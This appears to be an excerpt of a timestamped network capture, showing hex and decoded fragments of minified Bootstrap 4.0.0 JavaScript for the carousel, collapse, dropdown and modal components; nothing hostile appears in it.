                                                                          2023-11-21 16:58:40 UTC377INData Raw: 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79 2c 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 65 26 26 69 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 65 29 2c 6e 26 26 69 28 74 2c 6e 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 28 72 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 74
                                                                          Data Ascii: {for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t
                                                                          2023-11-21 16:58:40 UTC378INData Raw: 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73 45 6c 65 6d 65 6e 74 28 6f 29 3f 22 65 6c 65 6d 65 6e 74 22 3a 28 6c 3d 6f 2c 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 6c 29 2e 6d 61 74 63 68 28 2f 5c 73 28 5b 61 2d 7a 41 2d 5a 5d 2b 29 2f 29 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 69 66 28 21 6e 65 77 20 52 65 67 45 78 70 28 72 29 2e 74 65 73 74 28 61 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72
                                                                          Data Ascii: eType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.isElement(o)?"element":(l=o,{}.toString.call(l).match(/\s([a-zA-Z]+)/)[1].toLowerCase());if(!new RegExp(r).test(a))throw new Error
                                                                          2023-11-21 16:58:40 UTC379INData Raw: 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 29 7d 2c 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6f 28 74 29 2e 64 65 74 61 63 68 28 29 2e 74 72 69 67 67 65 72 28 75 2e 43 4c 4f 53 45 44 29 2e 72 65 6d 6f 76 65 28 29 7d 2c 74 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20
                                                                          Data Ascii: End()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(t)},e._destroyElement=function(t){o(t).detach().trigger(u.CLOSED).remove()},t._jQueryInterface=function(e){return
                                                                          2023-11-21 16:58:40 UTC381INData Raw: 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 29 2c 74 26 26 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 43 29 7d 2c 65 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 2e 72 65 6d 6f 76 65 44
                                                                          Data Ascii: sList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria-pressed",!p(this._element).hasClass(C)),t&&p(this._element).toggleClass(C)},e.dispose=function(){p.removeD
                                                                          2023-11-21 16:58:40 UTC382INData Raw: 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43 54 49 56 45 3a 22 2e 61 63 74 69 76 65 22 2c 41 43 54 49 56 45 5f 49 54 45 4d 3a 22 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 2c 49 54 45 4d 3a 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 2c 4e 45 58 54 5f 50 52 45 56 3a 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 2c 20 2e 63 61 72 6f 75 73 65 6c
                                                                          Data Ascii: ta-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={ACTIVE:".active",ACTIVE_ITEM:".active.carousel-item",ITEM:".carousel-item",NEXT_PREV:".carousel-item-next, .carousel
                                                                          2023-11-21 16:58:40 UTC383INData Raw: 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54 45 4d 29 5b 30 5d 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 3b 69 66 28 21 28 65 3e 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 7c 7c 65 3c 30 29 29 69 66 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 29 74 28 74 68 69 73 2e 5f
                                                                          Data Ascii: tWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_ITEM)[0];var i=this._getItemIndex(this._activeElement);if(!(e>this._items.length-1||e<0))if(this._isSliding)t(this._
                                                                          2023-11-21 16:58:40 UTC385INData Raw: 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 3d 3d 3d 68 2c 69 3d 74 3d 3d 3d 63 2c 73 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 65 29 2c 72 3d 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 3b 69 66 28 28 69 26 26 30 3d 3d 3d 73 7c 7c 6e 26 26 73 3d 3d 3d 72
                                                                          Data Ascii: lt(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemByDirection=function(t,e){var n=t===h,i=t===c,s=this._getItemIndex(e),r=this._items.length-1;if((i&&0===s||n&&s===r
                                                                          2023-11-21 16:58:40 UTC386INData Raw: 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22 20 22 2b 73 2b 22 20 22 2b 69 29 2c 6f 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 6f 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 49 29 7d 2c 30 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 36 30 30 29 29
                                                                          Data Ascii: P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+" "+s+" "+i),o._isSliding=!1,setTimeout(function(){return t(o._element).trigger(I)},0)}).emulateTransitionEnd(600))
                                                                          2023-11-21 16:58:40 UTC387INData Raw: 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 2c 69 3d 22 2e 22 2b 6e 2c 6f 3d 74 2e 66 6e 5b 65 5d 2c 61 3d 7b 74 6f 67 67 6c 65 3a 21 30 2c 70 61 72 65 6e 74 3a 22 22 7d 2c 6c 3d 7b 74 6f 67 67 6c 65 3a 22 62 6f 6f 6c 65 61 6e 22 2c 70 61 72 65 6e 74 3a 22 28 73 74 72 69 6e 67 7c 65 6c 65 6d 65 6e 74 29 22 7d 2c 68 3d 7b 53 48 4f 57 3a 22 73 68 6f 77 22 2b 69 2c 53
                                                                          Data Ascii: rface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.collapse",i="."+n,o=t.fn[e],a={toggle:!0,parent:""},l={toggle:"boolean",parent:"(string|element)"},h={SHOW:"show"+i,S
                                                                          2023-11-21 16:58:40 UTC389INData Raw: 2e 6c 65 6e 67 74 68 26 26 28 65 3d 6e 75 6c 6c 29 2c 21 28 65 26 26 28 73 3d 74 28 65 29 2e 6e 6f 74 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 2e 64 61 74 61 28 6e 29 29 26 26 73 2e 5f 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 29 29 29 7b 76 61 72 20 6f 3d 74 2e 45 76 65 6e 74 28 68 2e 53 48 4f 57 29 3b 69 66 28 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 6f 29 2c 21 6f 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 7b 65 26 26 28 69 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 74 28 65 29 2e 6e 6f 74 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 2c 22 68 69 64 65 22 29 2c 73 7c 7c 74 28 65 29 2e 64 61 74 61 28 6e 2c 6e 75 6c 6c 29 29 3b 76 61 72 20 61 3d 74 68 69 73 2e
                                                                          Data Ascii: .length&&(e=null),!(e&&(s=t(e).not(this._selector).data(n))&&s._isTransitioning))){var o=t.Event(h.SHOW);if(t(this._element).trigger(o),!o.isDefaultPrevented()){e&&(i._jQueryInterface.call(t(e).not(this._selector),"hide"),s||t(e).data(n,null));var a=this.
                                                                          2023-11-21 16:58:40 UTC390INData Raw: 74 69 6f 6e 69 6e 67 28 21 30 29 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 28 21 31 29 2c 74 28 65 2e 5f 65 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 66 29 2e 61 64 64 43 6c 61 73 73 28 75 29 2e 74 72 69 67 67 65 72 28 68 2e 48 49 44 44 45 4e 29 7d 3b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 74 79 6c 65 5b 69 5d 3d 22 22 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 3f 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 61 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 36 30 30 29 3a 61 28 29 7d 7d 7d 2c 6f 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 69 6e
                                                                          Data Ascii: tioning(!0);var a=function(){e.setTransitioning(!1),t(e._element).removeClass(f).addClass(u).trigger(h.HIDDEN)};this._element.style[i]="",P.supportsTransitionEnd()?t(this._element).one(P.TRANSITION_END,a).emulateTransitionEnd(600):a()}}},o.setTransitionin
                                                                          2023-11-21 16:58:40 UTC391INData Raw: 7c 68 69 64 65 2f 2e 74 65 73 74 28 65 29 26 26 28 6c 2e 74 6f 67 67 6c 65 3d 21 31 29 2c 6f 7c 7c 28 6f 3d 6e 65 77 20 69 28 74 68 69 73 2c 6c 29 2c 73 2e 64 61 74 61 28 6e 2c 6f 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 65 2b 27 22 27 29 3b 6f 5b 65 5d 28 29 7d 7d 29 7d 2c 73 28 69 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30 2e 30 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                          Data Ascii: |hide/.test(e)&&(l.toggle=!1),o||(o=new i(this,l),s.data(n,o)),"string"==typeof e){if("undefined"==typeof o[e])throw new TypeError('No method named "'+e+'"');o[e]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.0.0"}},{key:"Default",get:function(){
                                                                          2023-11-21 16:58:40 UTC393INData Raw: 22 2c 62 6f 75 6e 64 61 72 79 3a 22 28 73 74 72 69 6e 67 7c 65 6c 65 6d 65 6e 74 29 22 7d 2c 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 65 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 2c 74 68 69 73 2e 5f 70 6f 70 70 65 72 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 3d 74 68 69 73 2e 5f 67 65 74 43 6f 6e 66 69 67 28 65 29 2c 74 68 69 73 2e 5f 6d 65 6e 75 3d 74 68 69 73 2e 5f 67 65 74 4d 65 6e 75 45 6c 65 6d 65 6e 74 28 29 2c 74 68 69 73 2e 5f 69 6e 4e 61 76 62 61 72 3d 74 68 69 73 2e 5f 64 65 74 65 63 74 4e 61 76 62 61 72 28 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 6c 3d 61 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 6c 2e 74 6f 67 67 6c 65
                                                                          Data Ascii: ",boundary:"(string|element)"},L=function(){function a(t,e){this._element=t,this._popper=null,this._config=this._getConfig(e),this._menu=this._getMenuElement(),this._inNavbar=this._detectNavbar(),this._addEventListeners()}var l=a.prototype;return l.toggle
                                                                          2023-11-21 16:58:40 UTC394INData Raw: 6c 21 3d 3d 74 68 69 73 2e 5f 70 6f 70 70 65 72 26 26 74 68 69 73 2e 5f 70 6f 70 70 65 72 2e 73 63 68 65 64 75 6c 65 55 70 64 61 74 65 28 29 7d 2c 6c 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 63 2e 43 4c 49 43 4b 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 65 2e 74 6f 67 67 6c 65 28 29 7d 29 7d 2c 6c 2e 5f 67 65 74 43 6f 6e 66 69 67 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 3d 72 28 7b 7d 2c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 44 65 66 61 75 6c 74 2c 74 28 74 68 69 73
                                                                          Data Ascii: l!==this._popper&&this._popper.scheduleUpdate()},l._addEventListeners=function(){var e=this;t(this._element).on(c.CLICK,function(t){t.preventDefault(),t.stopPropagation(),e.toggle()})},l._getConfig=function(n){return n=r({},this.constructor.Default,t(this
                                                                          2023-11-21 16:58:40 UTC395INData Raw: 65 29 7b 69 66 28 21 65 7c 7c 33 21 3d 3d 65 2e 77 68 69 63 68 26 26 28 22 6b 65 79 75 70 22 21 3d 3d 65 2e 74 79 70 65 7c 7c 39 3d 3d 3d 65 2e 77 68 69 63 68 29 29 66 6f 72 28 76 61 72 20 6e 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 45 29 29 2c 73 3d 30 3b 73 3c 6e 2e 6c 65 6e 67 74 68 3b 73 2b 2b 29 7b 76 61 72 20 72 3d 61 2e 5f 67 65 74 50 61 72 65 6e 74 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 6e 5b 73 5d 29 2c 6f 3d 74 28 6e 5b 73 5d 29 2e 64 61 74 61 28 69 29 2c 6c 3d 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 6e 5b 73 5d 7d 3b 69 66 28 6f 29 7b 76 61 72 20 68 3d 6f 2e 5f 6d 65 6e 75 3b 69 66 28 74 28 72 29 2e 68 61 73 43 6c 61 73 73 28 66 29 26 26 21 28 65 26 26 28 22 63 6c 69 63 6b 22 3d 3d 3d 65 2e 74 79 70 65 26 26 2f 69 6e 70 75 74 7c 74 65 78
                                                                          Data Ascii: e){if(!e||3!==e.which&&("keyup"!==e.type||9===e.which))for(var n=t.makeArray(t(E)),s=0;s<n.length;s++){var r=a._getParentFromElement(n[s]),o=t(n[s]).data(i),l={relatedTarget:n[s]};if(o){var h=o._menu;if(t(r).hasClass(f)&&!(e&&("click"===e.type&&/input|tex
                                                                          2023-11-21 16:58:40 UTC397INData Raw: 61 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30 2e 30 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 54 79 70 65 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 7d 5d 29 2c 61 7d 28 29 3b 72 65 74 75 72 6e 20 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 63 2e 4b 45 59 44 4f 57 4e 5f 44 41 54 41 5f 41 50 49 2c 45 2c 4c 2e 5f 64 61 74 61 41 70 69 4b 65 79 64 6f 77 6e 48 61 6e 64 6c 65 72 29 2e 6f 6e 28 63 2e 4b 45 59 44 4f 57 4e 5f 44 41 54 41 5f 41 50 49 2c 79 2c 4c 2e 5f 64 61 74 61 41 70 69 4b 65 79 64 6f
                                                                          Data Ascii: a,null,[{key:"VERSION",get:function(){return"4.0.0"}},{key:"Default",get:function(){return O}},{key:"DefaultType",get:function(){return k}}]),a}();return t(document).on(c.KEYDOWN_DATA_API,E,L._dataApiKeydownHandler).on(c.KEYDOWN_DATA_API,y,L._dataApiKeydo
                                                                          2023-11-21 16:58:40 UTC398INData Raw: 42 41 52 5f 54 4f 47 47 4c 45 52 3a 22 2e 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 6e 29 7b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 3d 74 68 69 73 2e 5f 67 65 74 43 6f 6e 66 69 67 28 6e 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 65 2c 74 68 69 73 2e 5f 64 69 61 6c 6f 67 3d 74 28 65 29 2e 66 69 6e 64 28 67 2e 44 49 41 4c 4f 47 29 5b 30 5d 2c 74 68 69 73 2e 5f 62 61 63 6b 64 72 6f 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 73 53 68 6f 77 6e 3d 21 31 2c 74 68 69 73 2e 5f 69 73 42 6f 64 79 4f 76 65 72 66 6c 6f 77 69 6e 67 3d 21 31 2c 74 68 69 73 2e 5f 69 67 6e 6f 72 65 42 61 63 6b 64 72 6f 70 43 6c 69 63 6b 3d 21 31 2c 74 68 69 73 2e 5f 6f 72 69 67 69 6e 61 6c 42 6f 64 79
                                                                          Data Ascii: BAR_TOGGLER:".navbar-toggler"},p=function(){function o(e,n){this._config=this._getConfig(n),this._element=e,this._dialog=t(e).find(g.DIALOG)[0],this._backdrop=null,this._isShown=!1,this._isBodyOverflowing=!1,this._ignoreBackdropClick=!1,this._originalBody
                                                                          2023-11-21 16:58:40 UTC399INData Raw: 73 26 26 28 74 68 69 73 2e 5f 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 21 30 29 2c 74 68 69 73 2e 5f 73 65 74 45 73 63 61 70 65 45 76 65 6e 74 28 29 2c 74 68 69 73 2e 5f 73 65 74 52 65 73 69 7a 65 45 76 65 6e 74 28 29 2c 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 66 66 28 68 2e 46 4f 43 55 53 49 4e 29 2c 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 66 66 28 68 2e 43 4c 49 43 4b 5f 44 49 53 4d 49 53 53 29 2c 74 28 74 68 69 73 2e 5f 64 69 61 6c 6f 67 29 2e 6f 66 66 28 68 2e 4d 4f 55 53 45 44 4f 57 4e 5f 44 49 53 4d 49 53 53 29 2c 73 3f 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66
                                                                          Data Ascii: s&&(this._isTransitioning=!0),this._setEscapeEvent(),this._setResizeEvent(),t(document).off(h.FOCUSIN),t(this._element).removeClass(_),t(this._element).off(h.CLICK_DISMISS),t(this._dialog).off(h.MOUSEDOWN_DISMISS),s?t(this._element).one(P.TRANSITION_END,f
                                                                          2023-11-21 16:58:40 UTC401INData Raw: 30 30 29 3a 72 28 29 7d 2c 70 2e 5f 65 6e 66 6f 72 63 65 46 6f 63 75 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 66 66 28 68 2e 46 4f 43 55 53 49 4e 29 2e 6f 6e 28 68 2e 46 4f 43 55 53 49 4e 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 64 6f 63 75 6d 65 6e 74 21 3d 3d 6e 2e 74 61 72 67 65 74 26 26 65 2e 5f 65 6c 65 6d 65 6e 74 21 3d 3d 6e 2e 74 61 72 67 65 74 26 26 30 3d 3d 3d 74 28 65 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 28 6e 2e 74 61 72 67 65 74 29 2e 6c 65 6e 67 74 68 26 26 65 2e 5f 65 6c 65 6d 65 6e 74 2e 66 6f 63 75 73 28 29 7d 29 7d 2c 70 2e 5f 73 65 74 45 73 63 61 70 65 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 69 73 53 68
                                                                          Data Ascii: 00):r()},p._enforceFocus=function(){var e=this;t(document).off(h.FOCUSIN).on(h.FOCUSIN,function(n){document!==n.target&&e._element!==n.target&&0===t(e._element).has(n.target).length&&e._element.focus()})},p._setEscapeEvent=function(){var e=this;this._isSh
